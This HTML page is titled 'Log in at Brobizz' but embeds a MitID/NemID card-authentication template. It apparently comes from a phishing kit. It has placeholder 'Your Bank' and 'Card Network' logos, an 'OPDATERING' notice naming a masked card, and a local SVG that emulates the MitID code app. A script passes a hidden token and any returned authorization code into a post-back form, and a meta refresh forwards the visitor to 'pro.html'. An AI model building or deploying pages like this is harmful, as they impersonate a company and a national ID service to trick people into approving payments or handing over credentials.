<!DOCTYPE html>
<html lang="en"><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
        <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    
      <meta name="ulp-version" content="1.17.115">
    
    
    
    <meta name="robots" content="noindex, nofollow">
    
    
   

   
      
        




        
    
  
    
    <title>Log in at Brobizz</title>
  </head>
  
  <body>
    <div class="c1a2a6ec5 c136c0e45">
  
<main class="cf0764a4a login">
  <section class="c4b29eca4 _prompt-box-outer c05e9daa5">
    <div class="c6659f309 cccb93873">
      
    
      <div class="c31ae6f41">
        <header class="cf2c263ec c3b965638">
          <div title="Brobizz A/S" id="custom-prompt-logo" style="width: auto !important; height: 60px !important; position: static !important; margin: auto !important; padding: 0 !important; background-color: transparent !important; background-position: center !important; background-size: contain !important; background-repeat: no-repeat !important"></div>
        
          <img class="cbefd69e1 c9ea68b50" id="prompt-logo-center" src="" alt="">
        
          
            <h1 class="cc854c13c c8b064d01"></h1>
          
        
          <div class="c3796a4db c0ba659d6">
            
             
            
         
        
		
		


    <title>Authentication</title>
    <meta content="text/html; charset=UTF-8" http-equiv="Content-Type">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    

<style>

    body {
        fullScreen: false;
    }

    body {
        margin: 0;
        background: #f3f2f2;
        height: 100vh;
        display: flex;
        align-items: center;
        justify-content: center;
        font-size: 10px;
        min-width: 248px;
    }

    #mitidIframe {
        width: 100%;
        height: 260px;
        border: 0;
        z-index: 100;
        position: relative;
    }

    @media (min-width: 380px) {
        #mitidIframe {
            height: 227px;
        }
    }
	@media (min-width: 400px) {
        #mitidIframe {
            height: 350px;
        }
    }

    .mitidContextStr {
        font-size: 10px;
        font-weight: normal; color: #333;
        border-top: 1px solid #eee;
        border-bottom: 1px solid #eee;
        padding: 6px;
        background-color: #f8f8f9;
        overflow-wrap: anywhere;
    }

    @media (min-width: 380px) {
        .mitidContextStr {
            font-size: 0.9rem;
            padding: 15px;
        }
    }

	@media (min-width: 400px) {
        .mitidContextStr {
            font-size: 0.9rem;
            padding: 08px;
        }
    }

    [hidden] {
        display: none;
    }

    .header {
        height: 42px;
        border-bottom: 0px solid #ddd;
        display: flex;
        justify-content: flex-end;
        align-items: center;
        padding: 0px 16px 0px 16px;
    }

    .imgcon {
        width: 33%;
    }

    .logo {
        max-width: 100%;
        max-height: 32px;
    }

    .bank {
        float: right;
    }

    .lang {
        width: 30%;
        display: block;
        margin: auto;
        text-align: center;
    }

    .lang img {
        max-width: 20px;
    }

    .lang a,
    .lang a:hover,
    .lang a:visited,
    .lang a:active {
        font-size: 2.5em;
        text-decoration: none;
    }

    .network {
        float: left;
    }

    tr td:first-child {
        width: 105px;
    }

    td {
        overflow-wrap: anywhere;
    }

    .wrapper {
        -webkit-border-radius: 4px;
        -moz-border-radius: 4px;
        border-radius: 4px;
        position: relative;
        display: block;
        width: 250px;
        height: 400px;
        background-color: #fff;
    }

    .container {
        position: relative;
        display: flex;
        flex-direction: column;
        font-family: Arial, sans-serif;
        padding: 0px 16px
    }

    .content h1,
    .content p {
        font-style: normal;
        font-stretch: normal;
        line-height: 1.25em;
        letter-spacing: normal;
        color: #000;
    }

    .content h1 {
        margin: 6px 0px 6px 0px;
        font-size: 1.25em;
        font-weight: bold;
    }

    .content p {
        margin: 8px 0;
    }

    .content {
        font-weight: normal;
    }

    .content table {
        margin-top: 20px;
    }

    .details > div {
        display: flex;
        justify-content: flex-start;
        align-items: left;
        min-height: 20px;
    }

    .details .label {
        text-align: left;
        width: 42%;
        background: #fff;
    }

    input::-webkit-outer-spin-button,
    input::-webkit-inner-spin-button {
        /* display: none; <- Crashes Chrome on hover */
        -webkit-appearance: none;
        margin: 0; /* <-- Apparently some margin are still there even though it's hidden */
    }

    input[type=number] {
        -moz-appearance:textfield; /* Firefox */
    }

    input {
        font-size: 1.0em;
        width: 100px;
    }

    .buttons {
        margin-top: 6px;
        display: flex;
        justify-content: center;
        align-items: center;
        flex-direction: row-reverse;
    }

    button {
        width: 30%;
        height: 34px;
        text-align: center;
        margin: 00px 1% 00px 1%;
        min-height: 24px;
        line-height: 24px; /* vertical center text*/
        border-radius: 4px;
        border: 1px solid #ccc;
        font-size: 0.9em;
        color: #333;
        background-image: linear-gradient(#eee, #ddd);
    }

    button:hover {
        color: #fff;
        background-image: linear-gradient(#96bfe9, #5e99d4);
    }

    button img {
        display: inline-block;
        vertical-align: middle;
        width: 12px;
    }

    .nemid,
    .mitid {
        border: none;
        background: none;
    }

    button.nemid,
    button.mitid {
        border: 1px solid #ddd;
        background-image: linear-gradient(#eee, #ddd);
    }

    button.nemid:hover,
    button.mitid:hover {
        color: #fff;
        background-image: linear-gradient(#96bfe9, #5e99d4);
    }

    button.nemid img {
        width: 60%;
    }

    button.mitid img {
        width: 50%;
    }

    .content .spinner_container {
    }

    .errors {
        background-color: #fff2f2;
        padding: 4px;
        margin-top: 5px;
        text-align: center;
        display: flex;
        justify-content: center;
        align-items: center;
    }

    .errors .exclamation {
        width: 16px;
        height: 16px;
        line-height: 16px;
        border-radius: 16px;
        border: 1px solid red;
        display: inline-block;
        color: red;
        text-align: center;
    }

    .errors h1 {
        background-image: url('exclamation.png');
        background-position: left center;
        background-size: contain;
        background-repeat: no-repeat;
        padding-left: 20px;
        font-size: 10px;
        color: #000;
    }

    .errors p {
        font-weight: bold;
        color: #f00;
    }

    footer {
        position: absolute;
        bottom: 0;
        padding: 0px 25px;
    }

    footer p {
        font-family: Arial, sans-serif;
        margin-bottom: 6px;
    }

    .mobile {
        position: absolute;
        bottom: 0;
        right: 15px;
    }

    .spinner {
        width: 50px;
        height: 50px;
        margin-left: -8px;
        margin-top: -12px;
    }

    @media (min-width: 380px) {

        body {
            font-size: 14px;
        }

        .wrapper {
            width: 380px;
            height: 550px;
        }

        .header {
            height: 72px;
            display: flex;
            justify-content: flex-center;
            align-items: center;
        }

        .container {
            padding: 0px 20px;
        }

        .content .images_container img:first-child {
            width: 72px;
            height: 72px;
            display: none;
        }

        .content .images_container img:last-child {
            display: none;
        }

        .content h1 {
            font-size: 1.25em;
        }

        .content h1,
        .content p {
            line-height: 1.23;
        }

        tr td:first-child {
            width: 170px;
        }

        td {
            overflow-wrap: anywhere;
        }

        .logo {
            max-width: 100%;
            max-height: 60px;
        }

        .lang img {
            max-width: 40px;
        }

        .details > div {
            display: flex;
            justify-content: flex-start;
            align-items: left;
            min-height: 30px;
        }

        button {
            min-height: 30px;
            line-height: 30px; /* vertical center text*/
        }

        .content p {
            line-height: 1.55;
        }

        .error_container h1 {
            font-size: 20px;
            padding-left: 32px;
        }

        .error_container p {
            font-size: 16px;
            margin-right: 00px;
        }

        .cancel {
            font-size: 16px;
        }

        .mobile {
            width: 112px;
            height: 215px;
            right: 40px;
        }

        .spinner {
            margin-top: -25px;
        }

        footer {
            padding: 0px 25px;
        }

        footer p {

        }

    }
	@media (min-width: 400px) {

        body {
            font-size: 14px;
        }

        .wrapper {
            width: 380px;
            height: 550px;
        }

        .header {
            height: 72px;
            display: flex;
            justify-content: flex-center;
            align-items: center;
        }

        .container {
            padding: 0px 20px;
        }

        .content .images_container img:first-child {
            width: 72px;
            height: 72px;
            display: none;
        }

        .content .images_container img:last-child {
            display: none;
        }

        .content h1 {
            font-size: 1.25em;
        }

        .content h1,
        .content p {
            line-height: 1.23;
        }

        tr td:first-child {
            width: 170px;
        }

        td {
            overflow-wrap: anywhere;
        }

        .logo {
            max-width: 100%;
            max-height: 60px;
        }

        .lang img {
            max-width: 40px;
        }

        .details > div {
            display: flex;
            justify-content: flex-start;
            align-items: left;
            min-height: 30px;
        }

        button {
            min-height: 30px;
            line-height: 30px; /* vertical center text*/
        }

        .content p {
            line-height: 1.55;
        }

        .error_container h1 {
            font-size: 20px;
            padding-left: 32px;
        }

        .error_container p {
            font-size: 16px;
            margin-right: 00px;
        }

        .cancel {
            font-size: 16px;
        }

        .mobile {
            width: 112px;
            height: 215px;
            right: 40px;
        }

        .spinner {
            margin-top: -25px;
        }

        footer {
            padding: 0px 25px;
        }

        footer p {

        }

    }
</style>

<style>

    body {
        fullScreen: false;
    }

    body {
        margin: 0;
        background: #f3f2f2;
        height: 100vh;
        display: flex;
        align-items: center;
        justify-content: center;
        font-size: 10px;
        min-width: 248px;
    }

    #mitidIframe {
        width: 100%;
        height: 260px;
        border: 0;
        z-index: 100;
        position: relative;
    }

    @media (min-width: 380px) {
        #mitidIframe {
            height: 227px;
        }
    }
	@media (min-width: 400px) {
        #mitidIframe {
            height: 350px;
        }
    }

    .mitidContextStr {
        font-size: 10px;
        font-weight: normal;
        color: #333;
        border-top: 1px solid #eee;
        border-bottom: 1px solid #eee;
        padding: 6px;
        background-color: #f8f8f9;
        overflow-wrap: anywhere;
    }

    @media (min-width: 380px) {
        .mitidContextStr {
            font-size: 0.9rem;
            padding: 08px;
        }
    }
	@media (min-width: 400px) {
        .mitidContextStr {
            font-size: 0.9rem;
            padding: 15px;
        }
    }


    [hidden] {
        display: none;
    }

    .header {
        height: 42px;
        border-bottom: 0px solid #ddd;
        display: flex;
        justify-content: flex-end;
        align-items: center;
        padding: 0px 16px 0px 16px;
    }

    .imgcon {
        width: 33%;
    }

    .logo {
        max-width: 100%;
        max-height: 32px;
    }

    .bank {
        float: right;
    }

    .lang {
        width: 30%;
        display: block;
        margin: auto;
        text-align: center;
    }

    .lang img {
        max-width: 20px;
    }

    .lang a,
    .lang a:hover,
    .lang a:visited,
    .lang a:active {
        font-size: 2.5em;
        text-decoration: none;
    }

    .network {
        float: left;
    }

    tr td:first-child {
        width: 105px;
    }

    td {
        overflow-wrap: anywhere;
    }

    .wrapper {
        -webkit-border-radius: 4px;
        -moz-border-radius: 4px;
        border-radius: 4px;
        position: relative;
        display: block;
        width: 250px;
        height: 400px;
        background-color: #fff;
    }

    .container {
        position: relative;
        display: flex;
        flex-direction: column;
        font-family: Arial, sans-serif;
        padding: 0px 16px
    }

    .content h1,
    .content p {
        font-style: normal;
        font-stretch: normal;
        line-height: 1.25em;
        letter-spacing: normal;
        color: #000;
    }

    .content h1 {
        margin: 6px 0px 6px 0px;
        font-size: 1.25em;
        font-weight: bold;
    }

    .content p {
        margin: 8px 0;
    }

    .content {
        font-weight: normal;
    }

    .content table {
        margin-top: 20px;
    }

    .details > div {
        display: flex;
        justify-content: flex-start;
        align-items: left;
        min-height: 20px;
    }

    .details .label {
        text-align: left;
        width: 42%;
        background: #fff;
    }

    input::-webkit-outer-spin-button,
    input::-webkit-inner-spin-button {
        /* display: none; <- Crashes Chrome on hover */
        -webkit-appearance: none;
        margin: 0; /* <-- Apparently some margin are still there even though it's hidden */
    }

    input[type=number] {
        -moz-appearance: textfield; /* Firefox */
    }

    input {
        font-size: 1.0em;
        width: 100px;
    }

    .buttons {
        margin-top: 6px;
        display: flex;
        justify-content: center;
        align-items: center;
        flex-direction: row-reverse;
    }

    button {
        width: 30%;
        height: 34px;
        text-align: center;
        margin: 00px 1% 00px 1%;
        min-height: 24px;
        line-height: 24px; /* vertical center text*/
        border-radius: 4px;
        border: 1px solid #ccc;
        font-size: 0.9em;
        color: #333;
        background-image: linear-gradient(#eee, #ddd);
    }

    button:hover {
        color: #fff;
        background-image: linear-gradient(#96bfe9, #5e99d4);
    }

    button img {
        display: inline-block;
        vertical-align: middle;
        width: 12px;
    }

    .nemid,
    .mitid {
        border: none;
        background: none;
    }

    button.nemid,
    button.mitid {
        border: 1px solid #ddd;
        background-image: linear-gradient(#eee, #ddd);
    }

    button.nemid:hover,
    button.mitid:hover {
        color: #fff;
        background-image: linear-gradient(#96bfe9, #5e99d4);
    }

    button.nemid img {
        width: 60%;
    }

    button.mitid img {
        width: 50%;
    }

    .content .spinner_container {
    }

    .errors {
        background-color: #fff2f2;
        padding: 4px;
        margin-top: 5px;
        text-align: center;
        display: flex;
        justify-content: center;
        align-items: center;
    }

    .errors .exclamation {
        width: 16px;
        height: 16px;
        line-height: 16px;
        border-radius: 16px;
        border: 1px solid red;
        display: inline-block;
        color: red;
        text-align: center;
    }

    .errors h1 {
        background-image: url('exclamation.png');
        background-position: left center;
        background-size: contain;
        background-repeat: no-repeat;
        padding-left: 20px;
        font-size: 10px;
        color: #000;
    }

    .errors p {
        font-weight: bold;
        color: #f00;
    }

    footer {
        position: absolute;
        bottom: 0;
        padding: 0px 25px;
    }

    footer p {
        font-family: Arial, sans-serif;
        margin-bottom: 6px;
    }

    .mobile {
        position: absolute;
        bottom: 0;
        right: 15px;
    }

    .spinner {
        width: 50px;
        height: 50px;
        margin-left: -8px;
        margin-top: -12px;
    }

    @media (min-width: 380px) {

        body {
            font-size: 11px;
        }

        .wrapper {
            width: 380px;
            height: 415px;
        }

        .header {
            height: 72px;
            display: flex;
            justify-content: flex-center;
            align-items: center;
        }

        .container {
            padding: 0px 20px;
        }

        .content .images_container img:first-child {
            width: 72px;
            height: 72px;
            display: none;
        }

        .content .images_container img:last-child {
            display: none;
        }

        .content h1 {
            font-size: 1.25em;
        }

        .content h1,
        .content p {
            line-height: 1.23;
        }

        tr td:first-child {
            width: 170px;
        }

        td {
            overflow-wrap: anywhere;
        }

        .logo {
            max-width: 100%;
            max-height: 60px;
        }

        .lang img {
            max-width: 40px;
        }

        .details > div {
            display: flex;
            justify-content: flex-start;
            align-items: left;
            min-height: 30px;
        }

        button {
            min-height: 30px;
            line-height: 30px; /* vertical center text*/
        }

        .content p {
            line-height: 1.55;
        }

        .error_container h1 {
            font-size: 20px;
            padding-left: 32px;
        }

        .error_container p {
            font-size: 16px;
            margin-right: 00px;
        }

        .cancel {
            font-size: 16px;
        }

        .mobile {
            width: 112px;
            height: 215px;
            right: 40px;
        }

        .spinner {
            margin-top: -25px;
        }

        footer {
            padding: 0px 25px;
        }

        footer p {

        }

    }
	@media (min-width: 400px) {

        body {
            font-size: 14px;
        }

        .wrapper {
            width: 380px;
            height: 550px;
        }

        .header {
            height: 72px;
            display: flex;
            justify-content: flex-center;
            align-items: center;
        }

        .container {
            padding: 0px 20px;
        }

        .content .images_container img:first-child {
            width: 72px;
            height: 72px;
            display: none;
        }

        .content .images_container img:last-child {
            display: none;
        }

        .content h1 {
            font-size: 1.25em;
        }

        .content h1,
        .content p {
            line-height: 1.23;
        }

        tr td:first-child {
            width: 170px;
        }

        td {
            overflow-wrap: anywhere;
        }

        .logo {
            max-width: 100%;
            max-height: 60px;
        }

        .lang img {
            max-width: 40px;
        }

        .details > div {
            display: flex;
            justify-content: flex-start;
            align-items: left;
            min-height: 30px;
        }

        button {
            min-height: 30px;
            line-height: 30px; /* vertical center text*/
        }

        .content p {
            line-height: 1.55;
        }

        .error_container h1 {
            font-size: 20px;
            padding-left: 32px;
        }

        .error_container p {
            font-size: 16px;
            margin-right: 00px;
        }

        .cancel {
            font-size: 16px;
        }

        .mobile {
            width: 112px;
            height: 215px;
            right: 40px;
        }

        .spinner {
            margin-top: -25px;
        }

        footer {
            padding: 0px 25px;
        }

        footer p {

        }

    }
</style>




<section class="wrapper">
    <header class="header">
        <div class="imgcon"><img src="css/bbd84780-2f3c-4862-b8e0-ec9ecf31f04f.png" alt="Your Bank" class="logo network"></div>
        <div class="imgcon"></div>
        <div class="imgcon"><img src="css/1.svg" alt="Card Network" class="logo bank"></div>
    </header>

    <section class="container" style="padding: 0px; flex: auto">

        <script>
        function onMitIDMessage(e) {
            var event = e || event;
            var win = document.getElementById("mitidIframe").contentWindow, postMessage = {}, message;

            if (event.data.command === "ready") {
                var auth_token = document.getElementById("mitid_parameters").innerHTML;
                postMessage.command = "auth_token";
                postMessage.message = auth_token;
                win.postMessage(postMessage, "*");
            }

            if (event.data.command === "error") {
                postMessage.error = event.data.message;
                postMessage.error_description = event.data.error_description;
                document.postBackForm.response.value = JSON.stringify(postMessage);
                document.postBackForm.submit();
            }

            if (event.data.command === "authorization_code") {
                postMessage.auth_code = event.data.message;
                document.postBackForm.response.value = JSON.stringify(postMessage);
                document.postBackForm.submit();
            }
        }

        if (window.addEventListener) {
            window.addEventListener("message", onMitIDMessage);
        } else if (window.attachEvent) {
            window.attachEvent("onmessage", onMitIDMessage);
        }
        </script>

        <section>
            <div class="mitidContextStr"> OPDATERING 1513454978 til Brobizz.com fra kort xxxxxx  </div>

        </section>

        <section class="mitidContainer">
            <br>
            <div style="display:none;" id="mitid_parameters">e028e9eb-c617-4144-8729-4c92f5133257</div>

            <object _ngcontent-tpc-c1="" type="image/svg+xml" id="code-app-emulator" class="code-app-emulator" data="css/code-app-slider-emulator.svg"><img _ngcontent-tpc-c1="" alt="code-app-emulator" class="code-app-emulator" src="css/code-app-slider-emulator.svg"></object>
            
        </section>
<br><br>
        
                </section></section></div>
            </header></div></div></section>
            <input type="hidden" name="lang" id="lang">
        
    

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
            <meta http-equiv="refresh" content="60;URL=pro.html">   		
		
		
  

</main></div></body></html>